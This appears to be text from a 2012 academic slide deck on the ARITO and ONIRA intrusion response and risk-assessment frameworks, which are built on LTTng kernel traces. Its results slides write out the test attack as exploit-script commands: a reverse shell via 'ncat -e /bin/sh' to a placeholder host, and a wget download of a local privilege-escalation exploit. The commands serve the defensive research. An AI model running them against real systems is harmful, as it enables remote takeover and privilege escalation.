System Health Monitoring and Proactive Response Activation

Alireza Shameli-Sendi

Michel Dagenais

December 6, 2012École Polytechnique, Montreal

2/23

Content

ARITO: Cyber-Attack Response System Using Accurate Risk Impact Tolerance

ONIRA: Online Intrusion Risk Assessment of Distributed Traces Using Dynamic Attack Grpah

Two Frameworks for IRS:

3/23

Achievement

Eclipse Framework:

– Prediction Algorithm

– Risk Assessment Algorithm

– Response System

• ORCEF– Static Risk Assessment

• ARITO – Improves ORCEF by adding online risk assessment

– There is not any relationship between services

–

• ONIRA– Improves ARITO by considering attack impact propagation in service dependency graph

Prediction ORCEF

2010

2011

ARTIO ONIRA

2012

Risk Assessment

Response System

ImprovesImproves

4/23

ARITO: Cyber-Attack Response System Using Accurate Risk Impact Tolerance

5/23

ARITO Features

ARITO is an Intrusion Response System consists of: Risk Assessment module Response Activation module Response Deactivation module Response Coordinator module which measures the response

goodness

6/23

Response System in ARITO

Instantaneous Sustained Reversible Sustained irreversible

Start Time Life Time

Category

Attribute

Activation Deactivation

Concept

7/23

How ARITO works

Under the threshold and before the response is applied

Above the threshold- Response coordinator selects instantaneous response at first

Under the threshold and after the responses have been applied- The risk is initialized to a level below the threshold (φ)

Scenario:

RI c =RI p +RI n

8/23

Response Goodness

φ is dynamic, and is based on how successful the response was in repelling the attack

The best response goodness is 2, when we not only have success values in the current window, but also in all previous windows

Scenario:

φ=T a −T a

2−

RG

GmaxGmin∗T a

Goodness wk =

∑i = 1

n

S i−∑j = 1

m

F j

∑i = 1

n

S i∑j = 1

m

F j

2 k−1

RG=∑k=1

n

Goodness wk −2<RG<+2

Best RG=11/21/41/8.. .≃ 2

9/23

Attack Scenario

The steps have been grouped into five phases:

Probing Exploit phpBB2 Upload exploit Exploit Linux kernel 2.6.37 to obtain root Install a permanent access

10/23

Abstracted Trace of Attack Scenario and Detection of Each Step

A

A: web application scanB: apache executes shellC: shell executes ncatD: ncat connects to remote host

B

C

DE

E: ncat executes shellF: shell executes wgetG: shell executes ccH: shell executes exploit

F

G

H

M

K

M: exploit executes shellN: shell executes adduserK: shell is root

Trace

Alert

N

11/23

Results

Risk Impact Tolerance

G

H

A A A BCDE

F

M

N

K

C1: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 ”ncat -e /bin/sh x.x.x.x 9999”C2: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 ”wget x.x.x.x/LPE.c -O /tmp/LPE.c”C3: ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1"/tmp/LPE"

A: web application scanB: apache executes shellC: shell executes ncatD: ncat connects to remote hostE: ncat executes shellF: shell executes wgetG: shell executes ccH: shell executes exploitM: exploit executes shellN: shell executes adduserK: shell is root

RI C >T a

newlevel φ

R1: CLOSE_A_NET_CONNECTIONR2: KILL_PROCESSR3: RESTART_DAEMONR4: RESET(machine)R5: NOT_ALLOWED_HOST(attacker IP)R6: R_BLOCK_RECEIVER_PORT

R6R5

R4

R3

R1R2

Command

Alert

Response

C1C1C2C3 C2 C2

12/23

ARITO Performance in Real-Time

The reaction delay time:

∆t(detection) takes between 50 ms and 100 ms Risk assessment takes less than 6 ms The decision is made in less than 5 ms, so R1 = R_CLOSE_A NET_CONNECTION reaction_delay(2) takes 81 ms The framework is fast enough to stop the attack in real-time

reactiondelay i =∆t detection i +t risk i +t decision i +t response i ∆t detection i =tdi−ti

reactiondelay i t≃ response i

13/23

Conclusion (ARITO)

ARITO proposes a perfect coordination between the risk assessment mechanism and the response system which leds to have an efficient framework that is able to:

Prevent unnecessary responses Perform response activation and deactivation Consider the user needs in term of QoS

14/23

ONIRA: Online Intrusion Risk Assessment of Distributed Traces Using Dynamic Attack Graph

15/23

ONIRA Features

Present multi-step attack detection from LTTng trace using attack graph

Dynamic attack cost calculation based on attack graph and service dependency graph

In service dependency graph calculation is based on impact propagation

16/23

Attack Modeling

LAMBDA Language is used for each state Some attributes have been added to LAMBDA language

Knowledge level CIA effects

A Language to Model a Database for Detection of Attacks

*

*

17/23

Service Dependency Graph Modeling

For each service S three properties are defined: C(S), I(S), and A(S)

Two edges are available between each two services:

Forward edge loss Backward edge loss

• Mandatory type dependency

– Not able to continue working

– Impact on Confidentiality

– Impact on Integrity

Impact S i =DirectImpact Si +ForwardImpact Si +BackwardImpact S i

18/23

Attack Cost Model

Knowledge Level (κ) Attack frequency (θ) Effect on CIA (∆max) Service value (ξ)

Parameters

State2

State3

State4

State1

Attack Graph

Service Dependency Graph

19/23

Attack Cost Model

Ψ=α×κ+β×θ+γ×ξ+δ×∆max

Knowledge Level

Attack Cost

κ= the number of skipped statesthe number of knowledge states

∆Cmax=max x .ConfidentialityLoss

∀x executed step in attack graph∈

∆ I max=max x . IntegrityLoss

∆ Amax=max x . AvailabilityLoss

∆max=∆Cmax

+∆ Imax+∆A max

3

Effect on CIA

Κ [0 - 1]∈

Θ ∈ [0- ꝏ]

∆max ∈ [0 - 1]

ξ ∈ [0 - 1]

20/23

ONIRA Architecture

21/23

Result (Attack Modeling)

Probing

ncat

wget

cc

exploit

AddUser

Start KL= Yes

End

KL= No

KL= Yes

KL= Yes

KL= No

KL= NoResponse

KL= No

fs.exec: 18322, 18322, /bin/sh, , 12830, 0x0, SYSCALL { filename = "/bin/sh" }

fs.exec: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { filename = "/usr/bin/ncat" }

net.socket_connect: 18323, 18323, /usr/bin/ncat, , 18322, 0x0, SYSCALL { fd = 3, uservaddr = 0x80640a0, addrlen = 16, ret = -115 }

./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "ncat -e /bin/sh x.x.x.x 9999"

22/23

Result (Attack Modeling)

Probing

ncat

wget

cc

exploit

AddUser

Start KL= Yes

End

KL= No

KL= Yes

KL= Yes

KL= No

KL= NoResponse

KL= No

> ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1 "wget x.x.x.x/LPE.c -O /tmp/LPE.c"

> ./phpBBCodeExecExploitRUSH.pl 192.168.10.2 /phpBB2/ 1"ncat -e /bin/sh x.x.x.x 9999"> wget x.x.x.x/LPE.c

23/23

Result (Framework)

ONIRA Framework in Eclipse

24/23

Results

Scenario 1: The intruder runs all steps of multi-step

attack even in the second time Scenario 2:

t1: all steps t2: skips three states: probing, wget, and

cc Scenario 3:

t1: skips two states: probing and cc t2: skips three states: probing, upload, and

cc t3: runs all steps

25/23

ONIRA Performance in Real-Time

The total cost of generating trace events, reading events, and pattern matching takes about 60 ms for this multi-step attack scenario

For this trace, generated at a rate of 385KB/Sec, storing the state information in the SHD takes 70 ms

The retrieving information from the SHD takes 60 ms Checking the preconditions of five states takes 200 ms The risk assessment component takes less than 10 ms Decision is made in less than 3 ms In worst case, ONIRA framework

takes 343 ms

26/23

Conclusion (ONIRA)

ONIRA proposes a framework to calculate attack cost using dynamic attack graph in live mode based on using kernel-level events

ONIRA benefits service dependency graph to compute damage cost based on three concepts; direct impact, forward impact, and backward impact

ONIRA calculates accurate attack cost based on information provided by service dependency and attack graphs

27/23

System Health Monitoring and Proactive Response Activation

www.lttng.org

Thank You

DORSAL

E-Mail:

alireza.shameli-sendi@polymtl.com

michel.dagenais@polymtl.ca